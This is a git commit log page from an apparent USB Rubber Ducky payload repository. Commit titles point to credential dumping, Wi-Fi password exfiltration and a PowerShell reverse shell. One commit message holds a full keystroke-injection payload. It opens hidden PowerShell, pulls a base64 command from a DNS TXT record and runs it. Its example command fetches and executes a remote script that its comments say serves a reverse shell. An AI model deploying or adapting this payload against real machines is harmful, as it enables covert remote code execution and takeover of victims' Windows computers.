Commit Graph

1386 Commits (master)

Author SHA1 Message Date
Nate b4978b7b47
Update DNS-TXT-CommandInection.txt 2024-08-03 23:37:33 -05:00
Nate 1db132c3ac
Update README.md 2024-08-03 23:36:21 -05:00
Nate 902412339b
Update DNS-TXT-CommandInection.txt 2024-08-03 23:35:02 -05:00
Nate 7a36e6324a
Update powershellReverseShellOne-liner.ps1 2024-08-03 23:33:41 -05:00
Nate dad3d550fe
Create DNS-TXT-CommandInection.txt
REM     Title: DNS-TXT-CommandInection
REM     Author: Nate
REM     Description: A USB Rubber Ducky payload that leverages DNS TXT records to perform command injection.
REM     Windows PowerShell is the CLI used by the payload. Replace the DNS TXT record for your domain with
REM     the base64-encoded payload you have. See README.md for more details on converting your payload to base64
REM     and an example of creating your DNS TXT record in the AWS Route53 service.
REM     Target: Windows 10, 11
REM     Props: Hak5, Darren Kitchen, Korben
REM     Version: 1.0
REM     Category: Execution

REM     CONFIGURATION
REM     REQUIRED A domain with the ability to manipulate the DNS TXT records.
REM     REQUIRED Web Server hosting the payload. In this example, python3 http.server was used to host a
REM     reverse shell.
REM     REQUIRED - Provide URL used for Example
DEFINE  #MY_TARGET_URL example.com
REM     Example: powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
REM     Example of Decoded payload: "irm http://MY_TARGET_URL/T1.txt | iex"

REM     NOTES: No base64 can be used as an alternative by replacing "$a=",";powershell -e $a" with just "|iex"
REM     for the STRING payload below. Examples of the decoded command and encoded command are shown below to put 
REM     into DNS TXT record.
REM     Decoded: "irm http://MY_TARGET_URL/T1.txt | iex"
REM     Encoded: "aQByAG0AIABoAHQAdABwADoALwAvAGUAeABhAG0AcABsAGUALgBjAG8AbQAvAFQAMQAuAHQAeAB0ACAAfAAgAGkAZQB4AA=="

REM     ShoutOut: PowerShell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok. See link below.
REM     https://gist.github.com/egre55/c058744a4240af6515eb32b2d33fbed3
REM     The link below has the PowerShell script to convert your payloads to Base64.
REM     https://	

DELAY 1000 
GUI r
DELAY 1000
STRING powershell /w 1 $a=(resolve-dnsname MY_TARGET_URL TXT).strings;powershell -e $a
DELAY 500
ENTER
2024-08-03 23:32:09 -05:00
Nate 571e2e6e33
Create T1.txt 2024-08-03 23:30:46 -05:00
Nate 3578034173
Create powershellReverseShellOne-liner.ps1 2024-08-03 23:30:02 -05:00
Nate b31e55d14a
Create convertBase64.ps1 2024-08-03 23:29:01 -05:00
Nate 784e37b063
Create README.md 2024-08-03 23:27:09 -05:00
Nate 460c95f5df
Update .gitignore 2024-08-03 21:19:44 -05:00
Nate b1999a0e7e
Create .gitignore
.gitignore as a placeholder
2024-08-03 21:17:34 -05:00
Peaks 3b30121b9e
Merge pull request #467 from nic005-arch/master
DUCKY-Harvest
2024-07-24 16:21:42 -04:00
Nicolo’ c5fe32cf05
Update payload.txt 2024-07-24 22:12:43 +02:00
Nicolo’ 8754d6eab4
Update sy_cred.ps1 2024-07-24 21:23:43 +02:00
Nicolo’ 791133a14e
Update README.md 2024-07-24 21:23:04 +02:00
Nicolo’ dc4ccd1874
Update README.md 2024-07-24 21:22:14 +02:00
Nicolo’ 7972203c71
Update README.md 2024-07-24 21:18:14 +02:00
Nicolo’ 10b6ea2f0e
Update sy_cred.ps1 2024-07-24 21:15:49 +02:00
Nicolo’ 3dc6750316
Update payload.txt 2024-07-24 21:14:16 +02:00
Nicolo’ fcc1caf610
Update sy_cred.ps1 2024-07-24 19:58:46 +02:00
Nicolo’ 5f7db5486a
Delete cred-dump/sysa2.ps1 2024-07-24 19:52:22 +02:00
Nicolo’ d68bf2967f
Update payload.txt 2024-07-24 19:52:11 +02:00
Nicolo’ c231b242cb
Create sy_cred.ps1 2024-07-24 19:51:53 +02:00
Nicolo’ 74e1bf5bf3
Delete cred-dump/paylode.txt 2024-07-24 19:50:41 +02:00
Nicolo’ ab486b9b9f
Create payload.txt 2024-07-24 19:50:19 +02:00
Nicolo’ 4f1ae9c312
Create README.md 2024-07-24 19:47:41 +02:00
Nicolo’ f8587e6006
Delete cred-dump/README.md 2024-07-24 19:44:02 +02:00
Nicolo’ 87f6b3d780
Update README.md 2024-07-24 16:23:07 +02:00
Nicolo’ 4f92998fb9
Update README.md 2024-07-24 16:22:34 +02:00
Nicolo’ b92530bfca
Update README.md 2024-07-24 14:28:02 +02:00
Nicolo’ f84b6730e3
Update sysa2.ps1 2024-07-24 14:25:51 +02:00
Nicolo’ c57972728f
Create README.md 2024-07-24 14:25:16 +02:00
Nicolo’ b3f8d984b1
Update sysa2.ps1 2024-07-24 14:21:40 +02:00
Nicolo’ 8833b95983
Add files via upload 2024-07-24 14:19:45 +02:00
Nicolo’ 61ac533024
Create paylode.txt 2024-07-24 14:19:07 +02:00
Peaks 30de5c0260
Merge pull request #465 from F1ll0ry/master
WiFi-Passwords-Exfiltration-Via-SCP
2024-07-23 03:14:22 -04:00
zb0r 6bce38ad77 Renamed directory from WiFi-Passwords-Exfiltration to WiFi-Passwords-Exfiltration-Via-SCP 2024-07-22 09:01:08 +00:00
Peaks e17abcfa02
Merge pull request #464 from PlumpyTurkey/master
Updates extensions and payloads
2024-07-21 21:16:19 -04:00
zb0r 023c46c15a
Fixed a typo in the extension 2024-07-19 01:40:38 +03:00
zb0r 152f89c78d
fixed the extension 2024-07-19 01:34:58 +03:00
Peaks c79209168a
Update payload.txt
Fixing my mistake of wrong extension.
2024-07-18 16:56:45 -04:00
Peaks 6a33d49db1
Update payload.txt
Fixing Extension call. content was missing.
2024-07-18 16:54:34 -04:00
zb0r cd3d4e7e42
Create README.md 2024-07-18 12:05:14 +03:00
zb0r 25b879d4ff
Create Payload.txt 2024-07-18 12:04:12 +03:00
Robert Naame 17b28cd2ee Moved WiFi-Passwords-Exfiltration files to exfiltration directory 2024-07-18 11:51:12 +03:00
zb0r 50812cddfa
Updated a typo 2024-07-18 11:35:55 +03:00
zb0r 114209b817
Create README.md 2024-07-18 10:59:30 +03:00
zb0r c174b59c50
Create payload.txt 2024-07-18 10:56:11 +03:00
PlumpyTurkey da3191f6f2 Updates version badge 2024-07-12 16:51:33 +02:00
PlumpyTurkey 3e5ca780e6 Updates extensions 2024-07-12 16:46:13 +02:00